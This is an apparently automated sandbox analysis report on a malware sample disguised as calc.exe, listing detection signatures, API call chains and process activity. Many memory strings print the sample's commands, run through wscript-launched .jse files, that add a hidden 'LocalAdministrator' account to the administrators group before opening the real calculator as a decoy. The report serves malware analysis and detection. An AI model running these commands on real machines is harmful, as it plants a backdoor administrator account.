Windows Analysis Report
calc.exe

Overview

General Information

Sample name: calc.exe
Analysis ID: 1523632
MD5: 2f9fdad776d8626f2ce8625211831e91
SHA1: 21d8413eb0d60b36fc249f8025c277b557fefde3
SHA256: 9b66a8ea0f1c64965b06e7a45afbe56f2d4e6d5ef65f32446defccbebe730813
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Adds a new user with administrator rights
Machine Learning detection for sample
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Calculator Usage
Sigma detected: Suspicious Process Parents
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Add User to Local Administrators Group
Sigma detected: New User Created Via Net.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Machine Learning detection for sample
Source: calc.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: calc.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00425639 FindFirstFileW,FindFirstFileW,SetCurrentDirectoryW,FindClose,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00425639
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_004230D5 FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_004230D5
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0041510D FindFirstFileW,DeleteFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,FindNextFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose, 0_2_0041510D
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0042320D FindFirstFileW,FindClose, 0_2_0042320D
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00426292 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00426292
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00425838 FindFirstFileW,FindNextFileW,FindClose, 0_2_00425838
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00422C4D FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 0_2_00422C4D
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00414E16 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00414E16
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00414FFA FindFirstFileW,DeleteFileW,FindNextFileW,FindClose, 0_2_00414FFA
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0042A322 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,CloseClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_0042A322
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0042A4F2 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0042A4F2
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0042A322 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,CloseClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_0042A322
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0041111C GetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_0041111C
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_004045EC GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,GetWindowRect,GetWindowRect,MoveWindow,GetCursorPos,GetCursorPos,TrackPopupMenuEx,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,SetCapture,CharUpperBuffW,ClientToScreen,InvalidateRect,PostMessageW,GetMenuItemInfoW,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,FreeLibrary,DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,CharUpperBuffW,CharUpperBuffW,CharUpperBuffW,CharUpperBuffW,ReleaseCapture,SetWindowTextW,SendMessageW,CharUpperBuffW,CharUpperBuffW,ClientToScreen, 0_2_004045EC
Too many similar processes found
Source: net.exe Process created: 97
Source: wscript.exe Process created: 50
Source: net1.exe Process created: 98
Source: conhost.exe Process created: 55
Source: calc.exe Process created: 54

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00424856: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 0_2_00424856
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00415C2E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,SetSystemPowerState, 0_2_00415C2E
Detected potential crypto function
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0043244B 0_2_0043244B
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_004422B6 0_2_004422B6
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00444317 0_2_00444317
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0043A442 0_2_0043A442
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0043E46A 0_2_0043E46A
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_004045EC 0_2_004045EC
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0044E616 0_2_0044E616
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00448776 0_2_00448776
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0044D7D4 0_2_0044D7D4
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00456824 0_2_00456824
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00441961 0_2_00441961
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00442AF9 0_2_00442AF9
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00420D89 0_2_00420D89
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00421E0D 0_2_00421E0D
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00450F74 0_2_00450F74
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\calc.exe Code function: String function: 0044D788 appears 53 times
Source: C:\Users\user\Desktop\calc.exe Code function: String function: 00416BFE appears 81 times
Source: C:\Users\user\Desktop\calc.exe Code function: String function: 0044C070 appears 47 times
Sample file is different than original file name gathered from version info
Source: calc.exe, 00000000.00000003.1178714291.00000000006F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000016.00000003.1453548857.0000000000696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000001C.00000003.1460209856.000000000052F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000024.00000003.1471121602.0000000000546000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs calc.exe
Source: calc.exe, 00000024.00000003.1470623680.000000000052C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs calc.exe
Source: calc.exe, 00000024.00000002.1475138882.0000000000542000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs calc.exe
Source: calc.exe, 00000024.00000003.1468977669.000000000050D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000002C.00000003.1478067574.00000000007B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000034.00000003.1486413031.00000000006AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000003C.00000003.1497824684.0000000000706000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000044.00000003.1506819893.000000000073C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000004C.00000002.1522643546.00000000007C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs calc.exe
Source: calc.exe, 0000004C.00000002.1522643546.00000000007C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscrip( vs calc.exe
Source: calc.exe, 0000004C.00000003.1516311358.0000000000776000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000004C.00000003.1518749263.00000000007AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs calc.exe
Source: calc.exe, 0000004C.00000003.1518749263.00000000007AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscrip( vs calc.exe
Source: calc.exe, 00000054.00000003.1525573814.0000000000618000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000005C.00000003.1537726482.00000000007E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000064.00000003.1548583108.000000000076C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000006D.00000003.1561049180.0000000000803000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000074.00000003.1576653444.00000000007A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamews^ vs calc.exe
Source: calc.exe, 00000074.00000003.1572917619.0000000000788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000074.00000003.1579793068.00000000007BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamews^ vs calc.exe
Source: calc.exe, 0000007C.00000003.1587050221.00000000006E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000085.00000003.1600119427.0000000000568000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000008C.00000003.1613502945.00000000005F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000094.00000002.1646173888.0000000000658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000094.00000003.1635543590.000000000065E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000094.00000003.1633304703.0000000000630000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000094.00000003.1627534070.000000000064C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 0000009C.00000003.1642191193.0000000000629000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 000000A4.00000003.1660265603.0000000000852000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 000000A4.00000003.1662550226.000000000087F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 000000AE.00000003.1677807984.0000000000837000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Uses 32bit PE files
Source: calc.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: calc.exe Static PE information: Section: UPX1 ZLIB complexity 0.9900420984455959
Source: classification engine Classification label: mal64.winEXE@356/21@0/0
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0041FE6D GetLastError,FormatMessageW, 0_2_0041FE6D
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00415C2E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,SetSystemPowerState, 0_2_00415C2E
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_004240D8 SetErrorMode,GetDiskFreeSpaceW,FreeLibrary, 0_2_004240D8
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00430DCB OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,CoCreateInstanceEx,CoSetProxyBlanket, 0_2_00430DCB
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0041605B FindResourceW,FindResourceW,LoadResource,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0041605B
Source: C:\Users\user\Desktop\calc.exe File created: C:\Users\user\Desktop\JI8Y5YVUqE.jse Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5892:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1176:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1980:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
Source: C:\Users\user\Desktop\calc.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: calc.exe String found in binary or memory: IWshShell3.Run("wscript.exe WQTz1XtcXV.jse", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: calc.exe String found in binary or memory: IWshShell3.Run("wscript.exe 7s3912SDjb.jse", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
